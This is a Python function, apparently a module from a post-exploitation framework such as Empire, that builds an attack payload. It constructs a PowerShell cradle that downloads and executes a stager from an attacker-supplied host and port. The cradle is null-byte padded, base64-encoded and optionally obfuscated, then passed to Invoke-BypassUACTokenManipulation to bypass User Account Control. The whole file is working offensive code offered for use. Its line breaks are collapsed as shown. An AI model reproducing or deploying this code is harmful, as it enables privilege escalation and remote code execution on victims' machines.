def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ): # options stager = params["Stager"] host = params["Host"] user_agent = params["UserAgent"] port = params["Port"] # read in the common module source code script, err = main_menu.modules.get_module_source( module_name=module.script_path, obfuscate=obfuscate, obfuscate_command=obfuscation_command, ) if err: return handle_error_message(err) try: blank_command = "" powershell_command = "" encoded_cradle = "" cradle = ( "IEX \"(new-object net.webclient).downloadstring('%s:%s/%s')\"|IEX" % (host, port, stager) ) # Remove weird chars that could have been added by ISE n = re.compile("(\xef|\xbb|\xbf)") # loop through each character and insert null byte for char in n.sub("", cradle): # insert the nullbyte blank_command += char + "\x00" # assign powershell command as the new one powershell_command = blank_command # base64 encode the powershell command encoded_cradle = base64.b64encode(powershell_command) except Exception as e: pass script_end = 'Invoke-BypassUACTokenManipulation -Arguments "-w 1 -enc %s"' % ( encoded_cradle ) script = main_menu.modules.finalize_module( script=script, script_end=script_end, obfuscate=obfuscate, obfuscation_command=obfuscation_command, ) return script